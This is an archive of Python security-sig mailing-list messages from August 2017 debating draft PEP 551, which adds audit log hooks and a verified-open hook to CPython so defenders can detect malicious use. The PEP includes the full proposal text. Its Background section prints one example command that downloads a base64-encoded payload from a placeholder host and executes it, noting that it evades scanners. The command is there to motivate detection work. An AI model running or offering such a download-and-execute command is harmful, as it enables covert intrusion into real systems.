>>> have people trying to use 'spython' to replace their normal python
>>> 'because it's more secure' and stuff like that. Would it make sense to
>>> call it something else, like 'tpython' (for 'transparent'), or
>>> 'stdemo-python' (to emphasize that it's more intended as an example and
>>> starting point rather than a useful product)?
>
> This is an important point. It's going to be critical that we appropriately convey what "security transparency" means. I believe we can do this.
>
> Many of the convenience features (e.g., Windows-specific integrations like ETW) attached to this project should be made generally available. We should encourage users to deploy spython only where security transparency truly makes sense, and discourage its deployment where users just want access to some integration feature.
>
> (Note that it may not even make sense to deploy spython for work that requires ctypes or cffi or numpy or pywin32 or any other library that could allow raw memory access.)

Agreed. This is the point of the Recommendations section, and 
specifically the recommendation to not distribute any spython build 
outside of your own network (I explicitly said that python.org won't 
distribute builds, and it's up to any other distributors to make their 
own call).

If you build from source, you'll get spython, but currently I don't 
think it'll install from source (I certainly didn't change anything to 
make that work). That's the way I expect it to stay.

I think platform specific functionality should be kept separate, if only 
because testing and maintaining it is so much more difficult. Ideally 
security vendors will offer their own versions that organizations can 
build upon which integrate with their tools (and Microsoft certainly 
falls into this category for OS functionality like DeviceGuard and ETW), 
but I don't want our volunteers to have to worry about configuring test 
machines on their free time just to make sure it doesn't break (or to 
get caught up in liability disputes if someone relies on it when they 
really should have done due diligence).

Also, integration into things like the logging module (for ETW on 
Windows) are totally unrelated to this PEP. All it takes is someone to 
write the extension module and ship it on PyPI.


As an aside, one of Microsoft's top security guys saw a tweet about this 
and posted some screenshots of Python payloads in actual malware:

https://twitter.com/JohnLaTwC/statuses/900807173495771140

My favourite part is the Python 2.x and 3.x compatibility in the MacOS 
path of the first one :) (the Windows path in that one uses PowerShell).

Cheers,
Steve


From steve.dower at python.org  Thu Aug 24 16:12:23 2017
From: steve.dower at python.org (Steve Dower)
Date: Thu, 24 Aug 2017 13:12:23 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <ff24b811-192e-a53f-1b31-2e511df2da58@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
 <4deb1b45-69dd-a0f3-a41a-555dbbd442dd@python.org>
 <A1E65B87-2C1C-47D1-8BEC-C51B6E7A46D1@dontusethiscode.com>
 <ff24b811-192e-a53f-1b31-2e511df2da58@python.org>
Message-ID: <4a6786c2-f24f-d15b-cea3-32f6663cc1e6@python.org>

On 24Aug2017 1301, Steve Dower wrote:
> As an aside, one of Microsoft's top security guys saw a tweet about this
> and posted some screenshots of Python payloads in actual malware:
>
> https://twitter.com/JohnLaTwC/statuses/900807173495771140
>
> My favourite part is the Python 2.x and 3.x compatibility in the MacOS
> path of the first one :) (the Windows path in that one uses PowerShell).

Actually, looks like all the Python code in those is targeting macOS... 
the disadvantages of having Python pre-installed by default :)

Cheers,
Steve


From james at dontusethiscode.com  Thu Aug 24 15:41:24 2017
From: james at dontusethiscode.com (James Powell)
Date: Thu, 24 Aug 2017 15:41:24 -0400
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <4deb1b45-69dd-a0f3-a41a-555dbbd442dd@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
 <4deb1b45-69dd-a0f3-a41a-555dbbd442dd@python.org>
Message-ID: <A1E65B87-2C1C-47D1-8BEC-C51B6E7A46D1@dontusethiscode.com>


>> Like, we're inevitably going to
>> have people trying to use 'spython' to replace their normal python
>> 'because it's more secure' and stuff like that. Would it make sense to
>> call it something else, like 'tpython' (for 'transparent'), or
>> 'stdemo-python' (to emphasize that it's more intended as an example and
>> starting point rather than a useful product)?

This is an important point. It's going to be critical that we appropriately convey what "security transparency" means. I believe we can do this. 

Many of the convenience features (e.g., Windows-specific integrations like ETW) attached to this project should be made generally available. We should encourage users to deploy spython only where security transparency truly makes sense, and discourage its deployment where users just want access to some integration feature.

(Note that it may not even make sense to deploy spython for work that requires ctypes or cffi or numpy or pywin32 or any other library that could allow raw memory access.)

:j


From steve.dower at python.org  Thu Aug 24 22:23:34 2017
From: steve.dower at python.org (Steve Dower)
Date: Thu, 24 Aug 2017 19:23:34 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
Message-ID: <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>

I think overriding get_data in the subclass for source loading is the right approach. Rejecting .pyc files in the hook is easy enough, but for anyone doing proper validation (with a certificate or access control) I?d expect pyc?s to fail anyway.

Top-posted from my Windows phone

From: Brett Cannon
Sent: Thursday, August 24, 2017 18:58
To: Steve Dower; security-sig at python.org
Cc: lee.holmes at microsoft.com; james at dontusethiscode.com
Subject: Re: PEP 551: Security transparency in the Python runtime

One point to make about the importlib changes is that since it's currently being made to importlib.abc.FileLoader.get_data() that the default case for reading a non-.py file is to do nothing and allow the read to occur. Otherwise there will be issues with code that is using that method to read data files (which is a legit use-case). Otherwise we're going to need a new subclass of importlib.machinery.SourceFileLoader where we document that you can't use get_data() to read arbitrary bytes or restructure get_code() to not use get_data(). Or we need a new API to flag when get_data() should do a verifying open().
There should also the issue of not reading .pyc files which will either have to be addressed by coming up with a complimentary flag to PYTHONDONTWRITEBYTECODE or once again a special subclass where get_code() ignores bytecode completely.

On Thu, 24 Aug 2017 at 13:14 Steve Dower <steve.dower at python.org> wrote:
Hi security-sig,

Those of you who were at the PyCon US language summit this year (or who
saw the coverage at https://lwn.net/Articles/723823/) may recall that I
talked briefly about the ways Python is used by attackers to gain and/or
retain access to systems on local networks.

This comes out of work we've been doing at Microsoft to balance the
flexibility of scripting languages with their usefulness to malicious
users. PowerShell in particular has had a lot of work done, and we've
been doing the same internally for Python. Things like transcripting
(log every piece of code when it is compiled) and signature validation
(prevent loading unsigned code).

This PEP is about upstreaming enough functionality to make it easier to
maintain these features - it is *not* intended to add specific security
features to the core release. The aim is to be able to use a standard
libpython3.7/python37.dll with a custom python3.7/python.exe that adds
those features (listed in the PEP).

Right now parts of the PEP is incomplete. In particular, the
Recommendations section is much shorter than I intend, the list of log
hook locations is also too short, and I have only done a preliminary
performance analysis. But it's time to get reviews of the overall
concept. I'd also like to take suggestions for more hook locations and
relevant recommendations, so feel free to throw them out there. In
particular, I'm not as up to date on best practices for non-Windows
platforms as the rest of the list, so feel free to correct or improve
those parts.

Because ReST+max 80 character width makes tables completely unreadable
in source, I suggest reading it at
https://github.com/python/peps/blob/master/pep-0551.rst but I've
included the full text below for quoting purposes.

My current implementation is available at
https://github.com/zooba/cpython/tree/sectrans and should work on both
Windows and Linux. I hope to take this to python-dev by next week and
spend the dev sprints getting the PEP to the point where it can be accepted.

==========================================================

PEP: 551
Title: Security transparency in the Python runtime
Version: $Revision$
Last-Modified: $Date$
Author: Steve Dower <steve.dower at python.org>
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 23-Aug-2017
Python-Version: 3.7
Post-History:

Abstract
========

This PEP describes additions to the Python API and specific behaviors
for the
CPython implementation that make actions taken by the Python runtime
visible to
security and auditing tools. The goals in order of increasing importance
are to
prevent malicious use of Python, to detect and report on malicious use,
and most
importantly to detect attempts to bypass detection. Most of the
responsibility
for implementation is required from users, who must customize and build
Python
for their own environment.

We propose two small sets of public APIs to enable users to reliably
build their
copy of Python without having to modify the core runtime, protecting future
maintainability. We also discuss recommendations for users to help them
develop
and configure their copy of Python.

Background
==========

Software vulnerabilities are generally seen as bugs that enable remote or
elevated code execution. However, in our modern connected world, the more
dangerous vulnerabilities are those that enable advanced persistent threats
(APTs). APTs are achieved when an attacker is able to penetrate a network,
establish their software on one or more machines, and over time extract
data or
intelligence. Some APTs may make themselves known by maliciously
damaging data
(e.g., `WannaCrypt
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
or hardware (e.g., `Stuxnet
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
Most attempt to hide their existence and avoid detection. APTs often use a
combination of traditional vulnerabilities, social engineering, phishing (or
spear-phishing), thorough network analysis, and an understanding of
misconfigured environments to establish themselves and do their work.

The first infected machines may not be the final target and may not require
special privileges. For example, an APT that is established as a
non-administrative user on a developer?s machine may have the ability to
spread
to production machines through normal deployment channels. It is common
for APTs
to persist on as many machines as possible, with sheer weight of
presence making
them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their
tracks, the
biggest barrier to detection is a lack of insight. System administrators
with
large networks rely on distributed logs to understand what their
machines are
doing, but logs are often filtered to show only error conditions. APTs
that are
attempting to avoid detection will rarely generate errors or abnormal
events.
Reviewing normal operation logs involves a significant amount of effort,
though
work is underway by a number of companies to enable automatic anomaly
detection
within operational logs. The tools preferred by attackers are ones that are
already installed on the target machines, since log messages from these
tools
are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the
existence
of APTs or methods and mitigations that do not apply to this PEP. For
further
information about the field, we recommend reading or watching the resources
listed under `Further Reading`_.

Python is a particularly interesting tool for attackers due to its
prevalence on
server and developer machines, its ability to execute arbitrary code
provided as
data (as opposed to native binaries), and its complete lack of internal
logging.
This allows attackers to download, decrypt, and execute malicious code
with a
single command::

? ? ?python -c "import urllib.request, base64;
exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64')).decode())"

This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being
written to
disk (base64 is often sufficient to bypass these checks). It also bypasses
protections such as file access control lists or permissions (no file access
occurs), approved application lists (assuming Python has been approved
for other
uses), and automated auditing or logging (assuming Python is allowed to
access
the internet or access another machine on the local network from which
to obtain
its payload).

General consensus among the security community is that totally preventing
attacks is infeasible and defenders should assume that they will often
detect
attacks only after they have succeeded. This is known as the "assume breach"
mindset. [1]_ In this scenario, protections such as sandboxing and input
validation have already failed, and the important task is detection,
tracking,
and eventual removal of the malicious code. To this end, the primary feature
required from Python is security transparency: the ability to see what
operations the Python runtime is performing that may indicate anomalous or
malicious use. Preventing such use is valuable, but secondary to the need to
know that it is occurring.

To summarise the goals in order of increasing importance:

* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]_

Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given the value of
many
logs events are not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than
filtering
at the source (see the No Easy Breach video from above). Events that are
always
of interest include attempts to bypass event logging, attempts to load and
execute code that is not correctly signed or access-controlled, use of
uncommon
operating system functionality such as debugging or inter-process inspection
tools, most network access and DNS resolution, and attempts to create
and hide
files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in
order to
detect abnormal or malicious usage. Currently, the Python runtime does not
provide any ability to do this, which (anecdotally) has led to organizations
switching to other languages. The aim of this PEP is to enable system
administrators to deploy a security transparent copy of Python that can
integrate with their existing auditing and protection systems.

On Windows, some specific features that may be enabled by this include:

* Script Block Logging [3]_
* DeviceGuard [4]_
* AMSI [5]_
* Persistent Zone Identifiers [6]_
* Event tracing (which includes event forwarding) [7]_

On Linux, some specific features that may be integrated are:

* gnupg [8]_
* sd_journal [9]_
* OpenBSM [10]_
* syslog [11]_
* check execute bit on imported modules


On macOS, some features that may be used with the expanded APIs are:

* OpenBSM [10]_
* syslog [11]_

Overall, the ability to enable these platform-specific features on
production
machines is highly appealing to system administrators and will make Python a
more trustworthy dependency for application developers.


Overview of Changes
===================

True security transparency is not fully achievable by Python in
isolation. The
runtime can log as many events as it likes, but unless the logs are
reviewed and
analyzed there is no value. Python may impose restrictions in the name of
security, but usability may suffer. Different platforms and environments
will
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
encouraged to do so.

The aim of these changes is to enable system administrators to integrate
Python
into their existing security systems, without dictating what those
systems look
like or how they should behave. We propose two API changes to enable
this: an
Event Log Hook and Verified Open Hook. Both are not set by default, and both
require modifying the appropriate entry point to enable any
functionality. For
the purposes of validation and example, we propose a new spython/spython.exe
entry point program that enables some basic functionality using these hooks.
However, the expectation is that security-conscious organizations will
create
their own entry points to meet their needs.

Event Log Hook
--------------

In order to achieve security transparency, an API is required to raise
messages
from within certain operations. These operations are typically deep
within the
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.

The new APIs required for log hooks are::

? ? # Add a logging hook
? ? sys.addloghook(hook: Callable[str, tuple]) -> None
? ? int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));

? ? # Raise an event with all logging hooks
? ? sys.loghook(str, *args) -> None
? ? int PySys_LogHook(const char *event, PyObject *args);

? ? # Internal API used during Py_Finalize() - not publicly accessible
? ? void _Py_ClearLogHooks(void);

Hooks are added by calling ``PySys_AddLogHook()`` from C at any time,
including
before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from
Python code.
Hooks are never removed or replaced, and existing hooks have an
opportunity to
refuse to allow new hooks to be added (adding a logging hook is logged,
and so
preexisting hooks can raise an exception to block the new addition).

When events of interest are occurring, code can either call
``PySys_LogHook()``
from C (while the GIL is held) or ``sys.loghook()``. The string argument
is the
name of the event, and the tuple contains arguments. A given event name
should
have a fixed schema for arguments, and both arguments are considered a
public
API (for a given x.y version of Python), and thus should only change between
feature releases with updated documentation.

When an event is logged, each hook is called in the order it was added
with the
event name and tuple. If any hook returns with an exception set, later
hooks are
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.

When an event is logged but no hooks have been set, the ``loghook()``
function
should include minimal overhead. Ideally, each argument is a reference to
existing data rather than a value calculated just for the logging call.

As hooks may be Python objects, they need to be freed during
``Py_Finalize()``.
To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This
is an
internal function with no public export, but it passes an event to all
existing
hooks to ensure that unexpected calls are logged.

See `Log Hook Locations`_ for proposed log hook points and schemas, and the
`Recommendations`_ section for discussion on appropriate responses.

Verified Open Hook
------------------

Most operating systems have a mechanism to distinguish between files
that can be
executed and those that can not. For example, this may be an execute bit
in the
permissions field, or a verified hash of the file contents to detect
potential
code tampering. These are an important security mechanism for preventing
execution of data or code that is not approved for a given environment.
Currently, Python has no way to integrate with these when launching
scripts or
importing modules.

The new public API for the verified open hook is::

? ? # Set the handler
? ? int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char
*narrow, const wchar_t *wide))

? ? # Open a file using the handler
? ? os.open_for_exec(pathlike)

The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
binary access - any more restrictive behaviour requires the use of a custom
handler. (Aside: since ``importlib`` requires access to this function
before the
``os`` module has been imported, it will be available on the
``nt``/``posix``
modules, but the intent is that other users will access it through the
``os``
module.)

A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()``
from C
at any time, including before ``Py_Initialize()``. When
``open_for_exec()`` is
called with a handler set, the handler will be passed the processed
narrow or
wide path, depending on platform, and its return value will be returned
directly. The returned object should be an open file-like object that
supports
reading raw bytes. This is explicitly intended to allow a ``BytesIO``
instance
if the open handler has already had to read the file into memory in order to
perform whatever verification is necessary to determine whether the
content is
permitted to be executed.

Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.

If the handler determines that the file is not suitable for execution,
it should
raise an exception of its choice, as well as performing any other logging or
notifications.

All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to
note that
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function - a log hook that includes the code from these calls will be
added and
is the best opportunity to validate code that is read from the file.
Given the
current decoupling between import and execution in Python, most imported
code
will go through both ``open_for_exec()`` and the log hook for
``compile``, and
so care should be taken to avoid repeating verification steps.

API Availability
----------------

While all the functions added here are considered public and stable API, the
behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.

For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but
may do
nothing. This allows code to make calls to ``sys.loghook()`` without
having to
test for existence, but it should not assume that its call will have any
effect.
(Including existence tests in security-critical code allows another
vector to
bypass logging, so it is preferable that the function always exist.)

``os.open_for_exec()`` should at a minimum always return
``_io.open(pathlike,
'rb')``. Code using the function should make no further assumptions
about what
may occur, and implementations other than CPython are not required to let
developers override the behavior of this function with a hook.


Log Hook Locations
==================

Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the
following
operations with the schema in Table 1. Unless otherwise specified, the
ability
for log hooks to abort any listed operation should be considered part of the
rationale for including the hook.

.. csv-table:: Table 1: Log Hooks
? ? :header: "API Function", "Event Name", "Arguments", "Rationale"
? ? :widths: 2, 2, 3, 6

? ? ``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log
hooks are
? ? being added."
? ? ``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies
hooks they
? ? are being cleaned up, mainly in case the event is triggered
unexpectedly.
? ? This event cannot be aborted."
? ? ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "",
"Detects
? ? any attempt to set the ``open_for_execute`` handler."
? ? "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``",
``compile``, "
? ? ``(code, filename_or_none)``", "Detect dynamic code compilation.
Note that
? ? this will also be called for regular imports of source code,
including those
? ? that used ``open_for_exec``."
? ? ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
? ? sys.path_hooks)``", "Detect when modules are imported. This is
raised before
? ? the module name is resolved to a file. All arguments other than the
module
? ? name may be ``None`` if they are not used or available."
? ? "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
? ? ``(module_or_path,)``", "Detect when native modules are used."
? ? ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``",
"Collect
? ? information about specific symbols retrieved from native modules."
? ? ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect
when code
? ? is accessing arbitrary memory using ``ctypes``"
? ? ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing
the id of
? ? objects, which in CPython reveals information about memory layout."
? ? ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect
when
? ? code is accessing frames directly"
? ? ``sys._current_frames``, ``sys._current_frames``, "", "Detect when
code is
? ? accessing frames directly"
? ? ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
injecting
? ? trace functions. Because of the implementation, exceptions raised
from the
? ? hook will abort the operation, but will not be raised in Python
code. Note
? ? that ``threading.setprofile`` eventually calls this function, so the
event
? ? will be logged for each thread."
? ? ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is
injecting
? ? trace functions. Because of the implementation, exceptions raised
from the
? ? hook will abort the operation, but will not be raised in Python
code. Note
? ? that ``threading.settrace`` eventually calls this function, so the event
? ? will be logged for each thread."
? ? ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
? ? Detect changes to async generator hooks."
? ? ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
? ? Detect changes to async generator hooks."
? ? ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "",
"Detect
? ? changes to the coroutine wrapper."
? ? ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``,
"``(new_limit,)``", "
? ? Detect changes to the recursion limit."
? ? ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``,
"``(interval_us,)``
? ? ", "Detect changes to the switching interval."
? ? "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
? ? ``socket.sendmsg``, ``socket.sendto``", ``socket.address``,
"``(address,)``
? ? ", "Detect access to network resources. The address is unmodified
from the
? ? original call."
? ? ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
? ? creation of sockets. The arguments will be int values."
? ? ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
? ? retrieve the current host name."
? ? ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
? ? attempts to change the current host name. The name argument is
passed as a
? ? bytes object."
? ? "``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
? ? ``socket.gethostbyname``", "``(name,)``", "Detect host name
resolution. The
? ? name argument is a str or bytes object."
? ? ``socket.gethostbyaddr``, ``socket.gethostbyaddr``,
"``(address,)``", "Detect
? ? host resolution. The address argument is a str or bytes object."
? ? ``socket.getservbyname``, ``socket.getservbyname``, "``(name,
protocol)``", "
? ? Detect service resolution. The arguments are str objects."
? ? ``socket.getservbyport``, ``socket.getservbyport``, "``(port,
protocol)``", "
? ? Detect service resolution. The port argument is an int and protocol is a
? ? str."

TODO - more hooks in ``_socket``, ``_ssl``, others?


SPython Entry Point
===================

A new entry point binary will be added, called ``spython.exe`` on
Windows and
``spythonX.Y`` on other platforms. This entry point is intended
primarily as an
example, as we expect most users of this functionality to implement
their own
entry point and hooks (see `Recommendations`_). It will also be used for
tests.

Source builds will create ``spython`` by default, but distributors may
choose
whether to include ``spython`` in their pre-built packages. The python.org
managed binary distributions will not include ``spython``.

**Do not accept most command-line arguments**

The ``spython`` entry point requires a script file be passed as the first
argument, and does not allow any options. This prevents arbitrary code
execution
from in-memory data or non-script files (such as pickles, which can be
executed
using ``-m pickle <path>``.

Options ``-B`` (do not write bytecode), ``-E`` (ignore environment
variables)
and ``-s`` (no user site) are assumed.

If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it
will be
used to initialize ``sys.path`` following the rules currently described `for
Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.

**Log security events to a file**

Before initialization, ``spython`` will set a log hook that writes
events to a
local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in
`Recommendations`_).

The log hook will also abort all ``addloghook`` events, preventing any other
hooks from being added.

On Windows, code from ``compile`` events will submitted to AMSI [5]_ and
if it
fails to validate, the compile event will be aborted. This can be tested by
calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
<http://www.eicar.org/86-0-Intended-use.html>`_.

**Restrict importable modules**

Also before initialization, ``spython`` will set an open-for-execute
hook that
validates all files opened with ``os.open_for_exec``. This
implementation will
require all files to have a ``.py`` suffix (thereby blocking the use of
cached
bytecode), and will raise a custom log message ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.

On Windows, the hook will also open the file with flags that prevent any
other
process from opening it with write access, which allows the hook to perform
additional validation on the contents with confidence that it will not be
modified between the check and use. Compilation will later trigger a
``compile``
event, so there is no need to read the contents now for AMSI, but other
validation mechanisms such as DeviceGuard [4]_ should be performed here.


Performance Impact
==================

**TODO**

Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.loghook`` with no hooks added does not significantly
affect
any existing benchmarks, though targeted microbenchmarks can observe an
impact.

Performance impact using ``spython`` or with hooks added are not of interest
here, since this is considered opt-in functionality.


Recommendations
===============

Specific recommendations are difficult to make, as the ideal
configuration for any environment will depend on the user's ability to
manage, monitor, and respond to activity on their own network. However,
many of the proposals here do not appear to be of value without deeper
illustration. This section provides recommendations using the terms
**should** (or **should not**), indicating that we consider it dangerous
to ignore the advice, and **may**, indicating that for the advice ought
to be considered for high value systems. The term **sysadmins** refers
to whoever is responsible for deploying Python throughout your network,
though different organizations may have different titles for the
relevant person.

Sysadmins **should** build their own entry point, likely starting from
``spython``, and directly interface with the security systems available
in their environment. The more tightly integrated, the less likely a
vulnerability will be found allowing an attacker to bypass those
systems. In particular, the entry point **should not** obtain any
settings from the current environment, such as environment variables,
unless those settings are otherwise protected from modification.

The default ``python`` entry point **should not** be deployed to
production machines, but could be given to developers to use and test
Python on non-production machines. Sysadmins **may** consider deploying
a less restrictive version of their entry point to developer machines,
since any system connected to your network is a potential target.

Python deployments **should** be made read-only using any available
platform functionality after deployment and during use.

On platforms that support it, sysadmins **should** include signatures
for every file in a Python deployment, ideally verified using a private
certificate. For example, Windows supports embedding signatures in
executable files and using catalogs for others, and can use DeviceGuard
[4]_ to validate signatures either automatically or using an
``open_for_exec`` hook.

Sysadmins **should** collect as many logged events as possible, and
**should** copy them off of local machines frequently. Even if logs are
not being constantly monitored for suspicious activity, once an attack
is detected it is too late to enable logging. Log hooks **should not**
attempt to preemptively filter events, as even benign events are useful
when analyzing the progress of an attack. (Watch the "No Easy Breach"
video under `Further Reading`_ for a deeper look at this side of things.)

Log hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than
to prevent them. Very few actions should be aborted, as most will occur
during normal use. Sysadmins **may** audit their Python code and abort
operations that are known to never be used deliberately.

On production machines, the first log hook **should** be set in C code
before ``Py_Initialize`` is called, and that hook **should**
unconditionally abort the ``sys.addloghook`` event. The Python interface
is mainly useful for testing.

On production machines, a non-validating ``open_for_exec`` hook **may**
be set in C code before ``Py_Initialize`` is called. This prevents later
code from overriding the hook, however, logging the
``setopenforexecutehandler`` event is useful since no code should ever
need to call it. Using at least the sample ``open_for_exec`` hook
implementation from ``spython`` is recommended.

[TODO: more good advice; less bad advice]

Further Reading
===============


**Redefining Malware: When Old Terms Pose New Threats**
? ? ?By Aviv Raff for SecurityWeek, 29th January 2014

? ? ?This article, and those linked by it, are high-level summaries of
the rise of
? ? ?APTs and the differences from "traditional" malware.


`<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_

**Anatomy of a Cyber Attack**
? ? ?By FireEye, accessed 23rd August 2017

? ? ?A summary of the techniques used by APTs, and links to a number of
relevant
? ? ?whitepapers.


`<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_

**Automated Traffic Log Analysis: A Must Have for Advanced Threat
Protection**
? ? ?By Aviv Raff for SecurityWeek, 8th May 2014

? ? ?High-level summary of the value of detailed logging and automatic
analysis.


`<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_

**No Easy Breach: Challenges and Lessons Learned from an Epic
Investigation**
? ? ?Video presented by Matt Dunwoody and Nick Carr for Mandiant at
SchmooCon 2016

? ? ?Detailed walkthrough of the processes and tools used in detecting
and removing
? ? ?an APT.

? ? ?`<https://archive.org/details/No_Easy_Breach>`_

**Disrupting Nation State Hackers**
? ? ?Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

? ? ?Good security practices, capabilities and recommendations from the
chief of
? ? ?NSA's Tailored Access Operation.

? ? ?`<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_

References
==========

.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_

.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
? ? Protection Advances in Windows 10,
`<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_

.. [3]
`<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_

.. [4] `<https://aka.ms/deviceguard>`_

.. [5] AMSI,
`<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_

.. [6] Persistent Zone Identifiers,
`<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_

.. [7] Event tracing,
`<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_

.. [8] `<https://www.gnupg.org/>`_

.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_

.. [10] `<http://www.trustedbsd.org/openbsm.html>`_

.. [11] `<https://linux.die.net/man/3/syslog>`_

Acknowledgments
===============

Thanks to all the people from Microsoft involved in helping make the Python
runtime safer for production use, and especially to James Powell for
doing much
of the initial research, analysis and implementation, Lee Holmes for
invaluable
insights into the info-sec field and PowerShell's responses, and Brett
Cannon
for the grounding discussions.

Copyright
=========

Copyright (c) 2017 by Microsoft Corporation. This material may be
distributed
only subject to the terms and conditions set forth in the Open Publication
License, v1.0 or later (the latest version is presently available at
http://www.opencontent.org/openpub/).

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/security-sig/attachments/20170824/fdca7d17/attachment-0001.html>

From brett at python.org  Thu Aug 24 21:57:04 2017
From: brett at python.org (Brett Cannon)
Date: Fri, 25 Aug 2017 01:57:04 +0000
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
Message-ID: <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>

One point to make about the importlib changes is that since it's currently
being made to importlib.abc.FileLoader.get_data()
<https://docs.python.org/3/library/importlib.html#importlib.abc.FileLoader.get_data>
that the default case for reading a non-.py file is to do nothing and allow
the read to occur. Otherwise there will be issues with code that is using
that method to read data files (which is a legit use-case). Otherwise we're
going to need a new subclass of importlib.machinery.SourceFileLoader where
we document that you can't use get_data() to read arbitrary bytes or
restructure get_code() to not use get_data(). Or we need a new API to flag
when get_data() should do a verifying open().

There should also the issue of not reading .pyc files which will either
have to be addressed by coming up with a complimentary flag to
PYTHONDONTWRITEBYTECODE or once again a special subclass where get_code()
